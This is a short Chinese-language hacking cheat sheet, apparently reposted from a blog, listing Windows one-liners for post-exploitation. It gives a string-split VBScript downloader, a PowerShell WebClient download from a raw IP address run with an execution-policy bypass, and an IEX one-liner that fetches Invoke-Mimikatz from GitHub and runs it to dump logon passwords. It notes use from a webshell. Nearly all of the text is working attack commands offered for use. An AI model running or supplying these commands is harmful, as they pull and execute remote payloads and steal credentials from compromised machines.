vbs一句话下载转自冷风大神的文章:http://blog.csdn.net/chinafe/article/details/46860051
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> d:\d.vbs
利用方式为:
cscript d:/d.vbs http://114.55.40.185/Bin.rar d:/bin.rar
第一个参数是要下载的文件url地址,第二个参数是保存在本地的地址
powershell一句话下载文件:
echo $d=New-Object System.Net.WebClient;$d.DownloadFile("http://114.55.40.185/Bin.rar","C:/Temp/1.zip") >> 1.ps1
利用方式:
powershell -ExecutionPolicy Bypass -File .\1.ps1
powershell一句话获取主机密码(mimikatz的一句话版本)
Ps:似乎不能在webshell里面用
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –command sekurlsa::logonpasswords